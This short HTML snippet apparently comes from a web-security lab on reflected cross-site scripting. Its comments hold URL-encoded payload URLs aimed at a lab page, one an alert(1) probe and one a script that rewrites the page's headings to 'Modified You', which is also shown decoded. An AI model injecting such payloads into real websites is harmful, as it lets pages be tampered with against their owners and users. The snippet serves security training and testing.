<!-- http://lab.app.com/lab/webapp/jfp/1?url=%3Cscript%3Ealert%281%29%3C%2Fscript%3E -->
<script type="text/javascript">
  document.getElementsByTagName("h2")[2].innerHTML = "Modified You"
  document.getElementsByTagName("h1")[0].innerHTML = "Modified You"
</script>
<h2>Bug test 1</h2>
<h2>Bug test 2</h2>
<h2>Bug test 3</h2>
<!-- http://lab.app.com/lab/webapp/jfp/1?url=%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20document.
getElementsByTagName(%22h2%22)%5B2%5D.innerHTML%20%3D%20%22Modified%20You%22%0A%20%20document.
getElementsByTagName(%22h1%22)%5B0%5D.innerHTML%20%3D%20%22Modified%20You%22%0A%3C%2Fscript%3E -->
